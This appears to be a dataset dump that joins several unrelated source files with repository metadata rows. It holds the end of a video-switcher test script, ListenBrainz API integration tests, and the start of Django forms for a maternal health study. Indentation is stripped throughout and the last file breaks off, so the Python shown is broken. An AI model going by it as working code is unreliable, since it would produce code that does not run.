test_str = "PYTEST-{0!s}".format(random.randint(1,10))
run_test("{0!s} Name".format(input_id), "s3.get_input({0!s}).set_Name(\"{1!s}\")".format(input_id, test_str), "s3.get_input({0!s}).get_Name()".format(input_id), test_str)
print("\r\n# Destination Tests:")
for dest_id in s3.enum_dests():
dest_layers = s3.enum_layers(dest_id)
for layer_id in dest_layers:
id_string = "{0!s}/{1!s}".format(dest_id, layer_id)
test_int = int(random.randint(1,100))
run_test("{0!s} OWIN_HPos".format(id_string), "s3.get_layer({0!s}, {1!s}).set_OWIN_HPos({2!s})".format(dest_id, layer_id, test_int), "s3.get_layer({0!s}, {1!s}).get_OWIN_HPos()".format(dest_id, layer_id), test_int)
test_int = int(random.randint(1,100))
run_test("{0!s} OWIN_VPos".format(id_string), "s3.get_layer({0!s}, {1!s}).set_OWIN_VPos({2!s})".format(dest_id, layer_id, test_int), "s3.get_layer({0!s}, {1!s}).get_OWIN_VPos()".format(dest_id, layer_id), test_int)
test_int = int(random.randint(1,100))
run_test("{0!s} OWIN_HSize".format(id_string), "s3.get_layer({0!s}, {1!s}).set_OWIN_HSize({2!s})".format(dest_id, layer_id, test_int), "s3.get_layer({0!s}, {1!s}).get_OWIN_HSize()".format(dest_id, layer_id), test_int)
test_int = int(random.randint(1,100))
run_test("{0!s} OWIN_VSize".format(id_string), "s3.get_layer({0!s}, {1!s}).set_OWIN_VSize({2!s})".format(dest_id, layer_id, test_int), "s3.get_layer({0!s}, {1!s}).get_OWIN_VSize()".format(dest_id, layer_id), test_int)
"""
print("Disconnecting from E2/S3")
s3.stop()
quit()
| mit | -1,224,262,246,352,609,000 | 35.473684 | 219 | 0.638013 | false |
Freso/listenbrainz-server | listenbrainz/tests/integration/test_api.py | 1 | 36910 | import json
import time
import pytest
from flask import url_for
import listenbrainz.db.user as db_user
import listenbrainz.db.user_relationship as db_user_relationship
from listenbrainz import db
from listenbrainz.tests.integration import ListenAPIIntegrationTestCase
from listenbrainz.webserver.views.api_tools import is_valid_uuid
class APITestCase(ListenAPIIntegrationTestCase):
def setUp(self):
super(APITestCase, self).setUp()
self.followed_user = db_user.get_or_create(3, 'followed_user')
self.follow_user_url = url_for("social_api_v1.follow_user", user_name=self.followed_user["musicbrainz_id"])
self.follow_user_headers = {'Authorization': 'Token {}'.format(self.user['auth_token'])}
def test_get_listens_invalid_count(self):
"""If the count argument is negative, the API should raise HTTP 400"""
url = url_for('api_v1.get_listens',
user_name=self.user['musicbrainz_id'])
response = self.client.get(url, query_string={'count': '-1'})
self.assert400(response)
def test_get_listens_ts_order(self):
"""If min_ts is greater than max_ts, the API should raise HTTP 400"""
url = url_for('api_v1.get_listens',
user_name=self.user['musicbrainz_id'])
response = self.client.get(
url, query_string={'max_ts': '1400000000', 'min_ts': '1500000000'})
self.assert400(response)
def test_get_listens(self):
""" Test to make sure that the api sends valid listens on get requests.
"""
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
# send a listen
ts = int(time.time())
payload['payload'][0]['listened_at'] = ts
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
url = url_for('api_v1.get_listens',
user_name=self.user['musicbrainz_id'])
response = self.wait_for_query_to_have_items(
url, 1, query_string={'count': '1'})
data = json.loads(response.data)['payload']
self.assert200(response)
# make sure user id is correct
self.assertEqual(data['user_id'], self.user['musicbrainz_id'])
# make sure that count is 1 and list also contains 1 listen
self.assertEqual(data['count'], 1)
self.assertEqual(len(data['listens']), 1)
# make sure timestamp is the same as sent
sent_time = payload['payload'][0]['listened_at']
self.assertEqual(data['listens'][0]['listened_at'], sent_time)
self.assertEqual(data['listens'][0]
['track_metadata']['track_name'], 'Fade')
self.assertEqual(data['listens'][0]['track_metadata']
['artist_name'], 'Kanye West')
self.assertEqual(data['listens'][0]['track_metadata']
['release_name'], 'The Life of Pablo')
self.assertEqual(data['listens'][0]['track_metadata']
['additional_info']['listening_from'], 'spotify')
# make sure that artist msid, release msid and recording msid are present in data
self.assertTrue(is_valid_uuid(data['listens'][0]['recording_msid']))
self.assertTrue(is_valid_uuid(
data['listens'][0]['track_metadata']['additional_info']['artist_msid']))
self.assertTrue(is_valid_uuid(
data['listens'][0]['track_metadata']['additional_info']['release_msid']))
# check for latest listen timestamp
self.assertEqual(data['latest_listen_ts'], ts)
# request with min_ts should work
response = self.client.get(
url, query_string={'min_ts': int(time.time())})
self.assert200(response)
# request with max_ts lesser than the timestamp of the submitted listen
# should not send back any listens, should report a good latest_listen timestamp
response = self.client.get(url, query_string={'max_ts': ts - 2})
self.assert200(response)
self.assertListEqual(response.json['payload']['listens'], [])
self.assertEqual(response.json['payload']['latest_listen_ts'], ts)
# test request with both max_ts and min_ts is working
url = url_for('api_v1.get_listens',
user_name=self.user['musicbrainz_id'])
response = self.client.get(
url, query_string={'max_ts': ts + 1000, 'min_ts': ts - 1000})
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['user_id'], self.user['musicbrainz_id'])
self.assertEqual(data['count'], 1)
self.assertEqual(len(data['listens']), 1)
sent_time = payload['payload'][0]['listened_at']
self.assertEqual(data['listens'][0]['listened_at'], sent_time)
self.assertEqual(data['listens'][0]
['track_metadata']['track_name'], 'Fade')
self.assertEqual(data['listens'][0]['track_metadata']
['artist_name'], 'Kanye West')
self.assertEqual(data['listens'][0]['track_metadata']
['release_name'], 'The Life of Pablo')
# check that recent listens are fetched correctly
url = url_for('api_v1.get_recent_listens_for_user_list',
user_list=self.user['musicbrainz_id'])
response = self.client.get(url, query_string={'limit': '1'})
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['count'], 1)
url = url_for('api_v1.get_listen_count',
user_name=self.user['musicbrainz_id'])
response = self.client.get(url)
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['count'], 1)
url = url_for('api_v1.get_listen_count', user_name="sir_dumpsterfire")
response = self.client.get(url)
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['count'], 0)
    def test_get_listens_with_time_range(self):
        """ Test to make sure that the api honours the time_range parameter on get requests.
"""
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
# send three listens
user = db_user.get_or_create(1, 'test_time_range')
ts = 1400000000
for i in range(3):
payload['payload'][0]['listened_at'] = ts + (100 * i)
response = self.send_data(payload, user)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
old_ts = ts - 2592000 # 30 days
payload['payload'][0]['listened_at'] = old_ts
response = self.send_data(payload, user)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
expected_count = 3
url = url_for('api_v1.get_listens', user_name=user['musicbrainz_id'])
response = self.wait_for_query_to_have_items(url, expected_count)
data = json.loads(response.data)['payload']
self.assert200(response)
self.assertEqual(data['count'], expected_count)
self.assertEqual(data['listens'][0]['listened_at'], 1400000200)
self.assertEqual(data['listens'][1]['listened_at'], 1400000100)
self.assertEqual(data['listens'][2]['listened_at'], 1400000000)
url = url_for('api_v1.get_listens', user_name=user['musicbrainz_id'])
response = self.client.get(url, query_string={'time_range': 10})
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['count'], 4)
self.assertEqual(data['listens'][0]['listened_at'], 1400000200)
self.assertEqual(data['listens'][1]['listened_at'], 1400000100)
self.assertEqual(data['listens'][2]['listened_at'], 1400000000)
self.assertEqual(data['listens'][3]['listened_at'], old_ts)
        # Check that out-of-range time_range values are rejected
url = url_for('api_v1.get_listens', user_name=user['musicbrainz_id'])
response = self.client.get(url, query_string={'time_range': 0})
self.assert400(response)
url = url_for('api_v1.get_listens', user_name=user['musicbrainz_id'])
response = self.client.get(url, query_string={'time_range': 74})
self.assert400(response)
def test_get_listens_order(self):
""" Test to make sure that the api sends listens in valid order.
"""
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
# send three listens
ts = 1400000000
user = db_user.get_or_create(1, 'test_order')
for i in range(3):
payload['payload'][0]['listened_at'] = ts + (100 * i)
response = self.send_data(payload, user)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
expected_count = 3
url = url_for('api_v1.get_listens', user_name=user['musicbrainz_id'])
response = self.wait_for_query_to_have_items(url, expected_count)
data = json.loads(response.data)['payload']
self.assert200(response)
self.assertEqual(data['count'], expected_count)
self.assertEqual(data['listens'][0]['listened_at'], 1400000200)
self.assertEqual(data['listens'][1]['listened_at'], 1400000100)
self.assertEqual(data['listens'][2]['listened_at'], 1400000000)
# Fetch the listens with from_ts and make sure the order is descending
        url = url_for('api_v1.get_listens', user_name=user['musicbrainz_id'])
response = self.client.get(
url, query_string={'count': '3', 'from_ts': ts-500})
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['count'], expected_count)
self.assertEqual(data['listens'][0]['listened_at'], 1400000200)
self.assertEqual(data['listens'][1]['listened_at'], 1400000100)
self.assertEqual(data['listens'][2]['listened_at'], 1400000000)
def test_zero_listens_payload(self):
""" Test that API returns 400 for payloads with no listens
"""
for listen_type in ('single', 'playing_now', 'import'):
payload = {
'listen_type': listen_type,
'payload': [],
}
response = self.send_data(payload)
self.assert400(response)
def test_unauthorized_submission(self):
""" Test for checking that unauthorized submissions return 401
"""
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
# request with no authorization header
response = self.client.post(
url_for('api_v1.submit_listen'),
data=json.dumps(payload),
content_type='application/json'
)
self.assert401(response)
self.assertEqual(response.json['code'], 401)
# request with invalid authorization header
response = self.client.post(
url_for('api_v1.submit_listen'),
data=json.dumps(payload),
headers={'Authorization': 'Token testtokenplsignore'},
content_type='application/json'
)
self.assert401(response)
self.assertEqual(response.json['code'], 401)
    def test_valid_single(self):
        """ Test for valid submission of listen_type 'single'
"""
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
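        # For orientation, the 'single' submission exercised here has roughly
        # this shape (values illustrative, mirroring the fields asserted in
        # test_get_listens above):
        # {
        #   "listen_type": "single",
        #   "payload": [{
        #     "listened_at": 1400000000,
        #     "track_metadata": {
        #       "artist_name": "Kanye West",
        #       "track_name": "Fade",
        #       "release_name": "The Life of Pablo"
        #     }
        #   }]
        # }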
def test_single_more_than_one_listen(self):
""" Test for an invalid submission which has listen_type 'single' but
more than one listen in payload
"""
with open(self.path_to_data_file('single_more_than_one_listen.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_valid_playing_now(self):
""" Test for valid submission of listen_type 'playing_now'
"""
with open(self.path_to_data_file('valid_playing_now.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assert200(r)
self.assertEqual(r.json['payload']['count'], 1)
def test_playing_now_with_duration(self):
""" Test that playing now listens with durations expire
"""
with open(self.path_to_data_file('playing_now_with_duration.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 1)
self.assertEqual(r.json['payload']['listens'][0]
['track_metadata']['track_name'], 'Fade')
time.sleep(1.1)
# should have expired by now
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 0)
def test_playing_now_with_duration_ms(self):
""" Test that playing now submissions with duration_ms also expire
"""
with open(self.path_to_data_file('playing_now_with_duration_ms.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 1)
self.assertEqual(r.json['payload']['listens'][0]
['track_metadata']['track_name'], 'Fade')
time.sleep(1.1)
# should have expired by now
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 0)
def test_playing_now_with_ts(self):
""" Test for invalid submission of listen_type 'playing_now' which contains
timestamp 'listened_at'
"""
with open(self.path_to_data_file('playing_now_with_ts.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_playing_now_more_than_one_listen(self):
""" Test for invalid submission of listen_type 'playing_now' which contains
more than one listen in payload
"""
with open(self.path_to_data_file('playing_now_more_than_one_listen.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_valid_import(self):
""" Test for a valid submission of listen_type 'import'
"""
with open(self.path_to_data_file('valid_import.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
def test_too_large_listen(self):
""" Test for invalid submission in which the overall size of the listens sent is more than
10240 bytes
"""
with open(self.path_to_data_file('too_large_listen.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_too_many_tags_in_listen(self):
""" Test for invalid submission in which a listen contains more than the allowed
number of tags in additional_info.
"""
with open(self.path_to_data_file('too_many_tags.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_too_long_tag(self):
""" Test for invalid submission in which a listen contains a tag of length > 64
"""
with open(self.path_to_data_file('too_long_tag.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_invalid_release_mbid(self):
""" Test for invalid submission in which a listen contains an invalid release_mbid
in additional_info
"""
with open(self.path_to_data_file('invalid_release_mbid.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_invalid_artist_mbid(self):
""" Test for invalid submission in which a listen contains an invalid artist_mbid
in additional_info
"""
with open(self.path_to_data_file('invalid_artist_mbid.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_invalid_recording_mbid(self):
""" Test for invalid submission in which a listen contains an invalid recording_mbid
in additional_info
"""
with open(self.path_to_data_file('invalid_recording_mbid.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
def test_additional_info(self):
""" Test to make sure that user generated data present in additional_info field
of listens is preserved
"""
with open(self.path_to_data_file('additional_info.json'), 'r') as f:
payload = json.load(f)
payload['payload'][0]['listened_at'] = 1280258690
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
expected_length = 1
url = url_for('api_v1.get_listens',
user_name=self.user['musicbrainz_id'])
response = self.wait_for_query_to_have_items(
url, expected_length, query_string={'count': '1'})
data = json.loads(response.data)['payload']
self.assert200(response)
self.assertEqual(len(data['listens']), expected_length)
sent_additional_info = payload['payload'][0]['track_metadata']['additional_info']
received_additional_info = data['listens'][0]['track_metadata']['additional_info']
self.assertEqual(
sent_additional_info['best_song'], received_additional_info['best_song'])
self.assertEqual(
sent_additional_info['link1'], received_additional_info['link1'])
self.assertEqual(
sent_additional_info['link2'], received_additional_info['link2'])
self.assertEqual(
sent_additional_info['other_stuff'], received_additional_info['other_stuff'])
self.assertEqual(
sent_additional_info['nested']['info'], received_additional_info['nested.info'])
self.assertListEqual(
sent_additional_info['release_type'], received_additional_info['release_type'])
self.assertEqual(
sent_additional_info['spotify_id'], received_additional_info['spotify_id'])
self.assertEqual(
sent_additional_info['isrc'], received_additional_info['isrc'])
self.assertEqual(
sent_additional_info['tracknumber'], received_additional_info['tracknumber'])
self.assertEqual(
sent_additional_info['release_group_mbid'], received_additional_info['release_group_mbid'])
self.assertListEqual(
sent_additional_info['work_mbids'], received_additional_info['work_mbids'])
self.assertListEqual(
sent_additional_info['artist_mbids'], received_additional_info['artist_mbids'])
self.assertListEqual(
sent_additional_info['non_official_list'], received_additional_info['non_official_list'])
self.assertNotIn('track_name', sent_additional_info)
self.assertNotIn('artist_name', sent_additional_info)
self.assertNotIn('release_name', sent_additional_info)
def test_000_similar_users(self):
response = self.client.get(
url_for('api_v1.get_similar_users', user_name='my_dear_muppet'))
self.assert404(response)
conn = db.engine.raw_connection()
with conn.cursor() as curs:
data = {self.user2['musicbrainz_id']: .123}
curs.execute("""INSERT INTO recommendation.similar_user VALUES (%s, %s)""",
(self.user['id'], json.dumps(data)))
conn.commit()
response = self.client.get(
url_for('api_v1.get_similar_users', user_name=self.user['musicbrainz_id']))
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data[0]['user_name'], self.user2['musicbrainz_id'])
self.assertEqual(data[0]['similarity'], .123)
response = self.client.get(url_for(
'api_v1.get_similar_to_user', user_name=self.user['musicbrainz_id'], other_user_name="muppet"))
self.assert404(response)
response = self.client.get(url_for(
'api_v1.get_similar_to_user', user_name=self.user['musicbrainz_id'], other_user_name=self.user2['musicbrainz_id']))
self.assert200(response)
data = json.loads(response.data)['payload']
self.assertEqual(data['user_name'], self.user2['musicbrainz_id'])
self.assertEqual(data['similarity'], .123)
def test_latest_import(self):
""" Test for api.latest_import """
# initially the value of latest_import will be 0
response = self.client.get(url_for('api_v1.latest_import'), query_string={
'user_name': self.user['musicbrainz_id']})
self.assert200(response)
data = json.loads(response.data)
self.assertEqual(data['musicbrainz_id'], self.user['musicbrainz_id'])
self.assertEqual(data['latest_import'], 0)
# now an update
val = int(time.time())
response = self.client.post(
url_for('api_v1.latest_import'),
data=json.dumps({'ts': val}),
headers={'Authorization': 'Token {token}'.format(
token=self.user['auth_token'])}
)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
# now the value must have changed
response = self.client.get(url_for('api_v1.latest_import'), query_string={
'user_name': self.user['musicbrainz_id']})
self.assert200(response)
data = json.loads(response.data)
self.assertEqual(data['musicbrainz_id'], self.user['musicbrainz_id'])
self.assertEqual(data['latest_import'], val)
def test_latest_import_unauthorized(self):
""" Test for invalid tokens passed to user.latest_import view"""
val = int(time.time())
response = self.client.post(
url_for('api_v1.latest_import'),
data=json.dumps({'ts': val}),
headers={'Authorization': 'Token thisisinvalid'}
)
self.assert401(response)
self.assertEqual(response.json['code'], 401)
def test_latest_import_unknown_user(self):
"""Tests api.latest_import without a valid username"""
response = self.client.get(
url_for('api_v1.latest_import'), query_string={'user_name': ''})
self.assert404(response)
self.assertEqual(response.json['code'], 404)
def test_multiple_artist_names(self):
""" Tests multiple artist names in artist_name field of data """
with open(self.path_to_data_file('artist_name_list.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
self.assertEqual('artist_name must be a single string.',
response.json['error'])
def test_too_high_timestamps(self):
""" Tests for timestamps greater than current time """
with open(self.path_to_data_file('timestamp_in_ns.json'), 'r') as f:
payload = json.load(f)
payload['listened_at'] = int(time.time()) * 10**9
response = self.send_data(payload)
self.assert400(response)
self.assertEqual(response.json['code'], 400)
self.assertEqual(
'Value for key listened_at is too high.', response.json['error'])
def test_invalid_token_validation(self):
"""Sends an invalid token to api.validate_token"""
url = url_for('api_v1.validate_token')
response = self.client.get(url, query_string={"token": "invalidtoken"})
self.assert200(response)
self.assertEqual(response.json['code'], 200)
self.assertEqual('Token invalid.', response.json['message'])
self.assertFalse(response.json['valid'])
self.assertNotIn('user_name', response.json)
def test_valid_token_validation(self):
"""Sends a valid token to api.validate_token"""
url = url_for('api_v1.validate_token')
response = self.client.get(
url, query_string={"token": self.user['auth_token']})
self.assert200(response)
self.assertEqual(response.json['code'], 200)
self.assertEqual('Token valid.', response.json['message'])
self.assertTrue(response.json['valid'])
self.assertEqual(response.json['user_name'],
self.user['musicbrainz_id'])
def test_token_validation_auth_header(self):
"""Sends a valid token to api.validate_token in the Authorization header"""
url = url_for('api_v1.validate_token')
response = self.client.get(url, headers={
"Authorization": "Token {}".format(self.user['auth_token'])
})
self.assert200(response)
self.assertEqual(response.json['code'], 200)
self.assertEqual('Token valid.', response.json['message'])
self.assertTrue(response.json['valid'])
self.assertEqual(response.json['user_name'], self.user['musicbrainz_id'])
def test_get_playing_now(self):
""" Test for valid submission and retrieval of listen_type 'playing_now'
"""
r = self.client.get(url_for('api_v1.get_playing_now',
user_name='thisuserdoesnotexist'))
self.assert404(r)
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assertEqual(r.json['payload']['count'], 0)
self.assertEqual(len(r.json['payload']['listens']), 0)
with open(self.path_to_data_file('valid_playing_now.json'), 'r') as f:
payload = json.load(f)
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
r = self.client.get(url_for('api_v1.get_playing_now',
user_name=self.user['musicbrainz_id']))
self.assertTrue(r.json['payload']['playing_now'])
self.assertEqual(r.json['payload']['count'], 1)
self.assertEqual(len(r.json['payload']['listens']), 1)
self.assertEqual(r.json['payload']['user_id'],
self.user['musicbrainz_id'])
self.assertEqual(r.json['payload']['listens'][0]
['track_metadata']['artist_name'], 'Kanye West')
self.assertEqual(r.json['payload']['listens'][0]
['track_metadata']['release_name'], 'The Life of Pablo')
self.assertEqual(r.json['payload']['listens'][0]
['track_metadata']['track_name'], 'Fade')
@pytest.mark.skip(reason="Test seems to fail when running all integration tests, but passes when run individually. "
"Skip for now")
def test_delete_listen(self):
with open(self.path_to_data_file('valid_single.json'), 'r') as f:
payload = json.load(f)
# send a listen
ts = int(time.time())
payload['payload'][0]['listened_at'] = ts
response = self.send_data(payload)
self.assert200(response)
self.assertEqual(response.json['status'], 'ok')
url = url_for('api_v1.get_listens',
user_name=self.user['musicbrainz_id'])
response = self.wait_for_query_to_have_items(url, 1)
data = json.loads(response.data)['payload']
self.assertEqual(len(data['listens']), 1)
delete_listen_url = url_for('api_v1.delete_listen')
data = {
"listened_at": ts,
"recording_msid": payload['payload'][0]['track_metadata']['additional_info']['recording_msid']
}
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
headers={'Authorization': 'Token {}'.format(
self.user['auth_token'])},
content_type='application/json'
)
self.assert200(response)
self.assertEqual(response.json["status"], "ok")
def test_delete_listen_not_logged_in(self):
delete_listen_url = url_for('api_v1.delete_listen')
data = {
"listened_at": 1486449409,
"recording_msid": "2cfad207-3f55-4aec-8120-86cf66e34d59"
}
# send a request without auth_token
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
content_type='application/json'
)
self.assert401(response)
# send a request with invalid auth_token
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
headers={'Authorization': 'Token {}'.format(
"invalidtokenpleaseignore")},
content_type='application/json'
)
self.assert401(response)
def test_delete_listen_missing_keys(self):
delete_listen_url = url_for('api_v1.delete_listen')
# send request without listened_at
data = {
"recording_msid": "2cfad207-3f55-4aec-8120-86cf66e34d59"
}
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
headers={'Authorization': 'Token {}'.format(
self.user['auth_token'])},
content_type='application/json'
)
self.assertStatus(response, 400)
self.assertEqual(response.json["error"], "Listen timestamp missing.")
# send request without recording_msid
data = {
"listened_at": 1486449409
}
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
headers={'Authorization': 'Token {}'.format(
self.user['auth_token'])},
content_type='application/json'
)
self.assertStatus(response, 400)
self.assertEqual(response.json["error"], "Recording MSID missing.")
def test_delete_listen_invalid_keys(self):
delete_listen_url = url_for('api_v1.delete_listen')
# send request with invalid listened_at
data = {
"listened_at": "invalid listened_at",
"recording_msid": "2cfad207-3f55-4aec-8120-86cf66e34d59"
}
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
headers={'Authorization': 'Token {}'.format(
self.user['auth_token'])},
content_type='application/json'
)
self.assertStatus(response, 400)
self.assertEqual(
response.json["error"], "invalid listened_at: Listen timestamp invalid.")
# send request with invalid recording_msid
data = {
"listened_at": 1486449409,
"recording_msid": "invalid recording_msid"
}
response = self.client.post(
delete_listen_url,
data=json.dumps(data),
headers={'Authorization': 'Token {}'.format(
self.user['auth_token'])},
content_type='application/json'
)
self.assertEqual(
response.json["error"], "invalid recording_msid: Recording MSID format invalid.")
def test_followers_returns_the_followers_of_a_user(self):
r = self.client.post(self.follow_user_url, headers=self.follow_user_headers)
self.assert200(r)
r = self.client.get(url_for("social_api_v1.get_followers", user_name=self.followed_user["musicbrainz_id"]))
self.assert200(r)
self.assertListEqual([self.user.musicbrainz_id], r.json['followers'])
def test_following_returns_the_people_who_follow_the_user(self):
r = self.client.post(self.follow_user_url, headers=self.follow_user_headers)
self.assert200(r)
r = self.client.get(url_for("social_api_v1.get_following", user_name=self.user["musicbrainz_id"]))
self.assert200(r)
self.assertListEqual(['followed_user'], r.json['following'])
def test_follow_user(self):
r = self.client.post(self.follow_user_url, headers=self.follow_user_headers)
self.assert200(r)
self.assertTrue(db_user_relationship.is_following_user(self.user.id, self.followed_user['id']))
def test_follow_user_requires_login(self):
r = self.client.post(self.follow_user_url)
self.assert401(r)
def test_following_a_nonexistent_user_errors_out(self):
r = self.client.post(url_for("social_api_v1.follow_user", user_name="user_doesnt_exist_lol"),
headers=self.follow_user_headers)
self.assert404(r)
def test_following_yourself_errors_out(self):
r = self.client.post(url_for("social_api_v1.follow_user", user_name=self.user.musicbrainz_id),
headers=self.follow_user_headers)
self.assert400(r)
def test_follow_user_twice_leads_to_error(self):
r = self.client.post(self.follow_user_url, headers=self.follow_user_headers)
self.assert200(r)
self.assertTrue(db_user_relationship.is_following_user(self.user.id, self.followed_user['id']))
# now, try to follow again, this time expecting a 400
r = self.client.post(self.follow_user_url, headers=self.follow_user_headers)
self.assert400(r)
def test_unfollow_user(self):
# first, follow the user
r = self.client.post(self.follow_user_url, headers=self.follow_user_headers)
self.assert200(r)
self.assertTrue(db_user_relationship.is_following_user(self.user.id, self.followed_user['id']))
# now, unfollow and check the db
r = self.client.post(url_for("social_api_v1.unfollow_user", user_name=self.followed_user["musicbrainz_id"]),
headers=self.follow_user_headers)
self.assert200(r)
self.assertFalse(db_user_relationship.is_following_user(self.user.id, self.followed_user['id']))
def test_unfollow_not_following_user(self):
r = self.client.post(url_for("social_api_v1.unfollow_user", user_name=self.followed_user["musicbrainz_id"]),
headers=self.follow_user_headers)
self.assert200(r)
self.assertFalse(db_user_relationship.is_following_user(self.user.id, self.followed_user['id']))
def test_unfollow_user_requires_login(self):
r = self.client.post(url_for("social_api_v1.unfollow_user", user_name=self.followed_user["musicbrainz_id"]))
self.assert401(r)
| gpl-2.0 | 7,448,170,422,559,113,000 | 42.321596 | 127 | 0.599512 | false |
botswana-harvard/tshilo-dikotla | td_maternal/forms/maternal_arv_preg_form.py | 1 | 8440 | from edc_appointment.models import Appointment
from edc_constants.constants import YES, NO, NOT_APPLICABLE
from django import forms
from django.apps import apps as django_apps
from ..models import (MaternalArvPreg, MaternalArv, MaternalLifetimeArvHistory)
from .base_maternal_model_form import BaseMaternalModelForm
def get_previous_visit(visit_obj, timepoints, subject_identifier):
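    """Return the visit that precedes `visit_obj` in the ordered list of
    timepoint codes, or None if there is no earlier visit.

    Walks the timepoint codes before the current visit's code in reverse
    order and returns the first matching visit found for this subject.
    """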
position = timepoints.index(
visit_obj.appointment.visit_definition.code)
timepoints_slice = timepoints[:position]
visit_model = django_apps.get_model(visit_obj._meta.label_lower)
if len(timepoints_slice) > 1:
timepoints_slice.reverse()
for point in timepoints_slice:
try:
previous_appointment = Appointment.objects.filter(
registered_subject__subject_identifier=subject_identifier, visit_definition__code=point).order_by('-created').first()
return visit_model.objects.filter(appointment=previous_appointment).order_by('-created').first()
except Appointment.DoesNotExist:
pass
except visit_model.DoesNotExist:
pass
except AttributeError:
pass
return None
class MaternalArvPregForm(BaseMaternalModelForm):
def clean(self):
cleaned_data = super(MaternalArvPregForm, self).clean()
self.validate_interrupted_medication()
self.validate_took_yes()
return cleaned_data
def validate_interrupted_medication(self):
cleaned_data = self.cleaned_data
if (cleaned_data.get('is_interrupt') == YES and
cleaned_data.get('interrupt') == NOT_APPLICABLE):
raise forms.ValidationError('You indicated that ARVs were interrupted during pregnancy. '
'Please provide a reason for interruption')
if (cleaned_data.get('is_interrupt') == NO and
cleaned_data.get('interrupt') != NOT_APPLICABLE):
raise forms.ValidationError('You indicated that ARVs were NOT interrupted during '
'pregnancy. You cannot provide a reason. Please correct.')
def validate_took_yes(self):
cleaned_data = self.cleaned_data
maternal_arv = self.data.get(
'maternalarv_set-0-arv_code')
if cleaned_data.get('took_arv') == YES:
if not maternal_arv:
raise forms.ValidationError(
{'took_arv': 'Please complete the maternal arv table.'})
# def validate_arv_exposed(self):
# cleaned_data = self.cleaned_data
# if cleaned_data.get('took_arv') == NO:
# registered_subject = cleaned_data.get('maternal_visit').appointment.registered_subject
# try:
# antental = AntenatalEnrollment.objects.get(registered_subject=registered_subject)
# if antental.valid_regimen_duration == YES:
# raise forms.ValidationError(
# "At ANT you indicated that the participant has been on regimen "
# "for period of time. But now you indicated that the participant did not "
# "take ARVs. Please Correct.")
# except AntenatalEnrollment.DoesNotExist:
# pass
# try:
# postnatal = PostnatalEnrollment.objects.get(registered_subject=registered_subject)
# if postnatal.valid_regimen_duration == YES:
# raise forms.ValidationError(
# "At PNT you indicated that the participant has been on regimen "
# "for period of time. But now you indicated that the participant did not "
# "take ARVs. Please Correct.")
# except PostnatalEnrollment.DoesNotExist:
# pass
class Meta:
model = MaternalArvPreg
fields = '__all__'
class MaternalArvForm(BaseMaternalModelForm):
def clean(self):
